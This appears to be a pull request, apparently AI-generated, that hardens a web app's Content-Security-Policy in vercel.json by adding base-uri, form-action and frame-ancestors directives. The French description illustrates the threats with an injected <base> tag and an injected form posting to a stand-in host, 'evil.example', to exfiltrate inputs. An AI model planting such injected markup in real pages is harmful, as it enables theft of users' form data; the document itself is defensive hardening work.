### PR TITLE
sec(csp): add base-uri + form-action + frame-ancestors

### DIFF
--- a/vercel.json
+++ b/vercel.json
@@ -8,7 +8,7 @@
       "headers": [
         {
           "key": "Content-Security-Policy",
-          "value": "default-src 'self'; script-src 'self' https://va.vercel-scripts.com; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://api.fontshare.com; font-src 'self' https://fonts.gstatic.com https://api.fontshare.com; img-src 'self' data: blob: https://*.supabase.co https://*.openfoodfacts.org; connect-src 'self' https://*.supabase.co wss://*.supabase.co https://*.openfoodfacts.org https://*.ingest.sentry.io https://*.ingest.us.sentry.io https://*.ingest.de.sentry.io https://vitals.vercel-insights.com https://va.vercel-scripts.com; frame-src https://js.stripe.com https://hooks.stripe.com; worker-src 'self' blob:"
+          "value": "default-src 'self'; base-uri 'self'; script-src 'self' https://va.vercel-scripts.com; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://api.fontshare.com; font-src 'self' https://fonts.gstatic.com https://api.fontshare.com; img-src 'self' data: blob: https://*.supabase.co https://*.openfoodfacts.org; connect-src 'self' https://*.supabase.co wss://*.supabase.co https://*.openfoodfacts.org https://*.ingest.sentry.io https://*.ingest.us.sentry.io https://*.ingest.de.sentry.io https://vitals.vercel-insights.com https://va.vercel-scripts.com; frame-src https://js.stripe.com https://hooks.stripe.com; worker-src 'self' blob:; form-action 'self'; frame-ancestors 'none'"
         },
         {
           "key": "X-Frame-Options",


### PR DESCRIPTION
## Contexte

Follow-up du review de la PR 107 (CSP hardening) — `base-uri` était absent, laissant un vecteur XSS résiduel (un `<base>` injecté peut retargeter toutes les URLs relatives du document).

## Fix

Micro-PR — 3 directives ajoutées dans `vercel.json` :

- `base-uri 'self'` — bloque `<base>` malveillant.
- `form-action 'self'` — bloque un `<form action=\"https://evil.example\">` injecté qui exfiltrerait les inputs.
- `frame-ancestors 'none'` — équivalent CSP de `X-Frame-Options: DENY` (déjà présent en header). CSP L2 est préféré par les browsers modernes.

## Non-impact

- Wan2Fit n'a pas de `<base>` tag.
- Tous les `<form>` postent same-origin (Supabase, edge functions, auth).
- Aucune intégration iframe.

## Validation

`npm run build` ✅.

🤖 Generated with [Claude Code](https://claude.com/claude-code)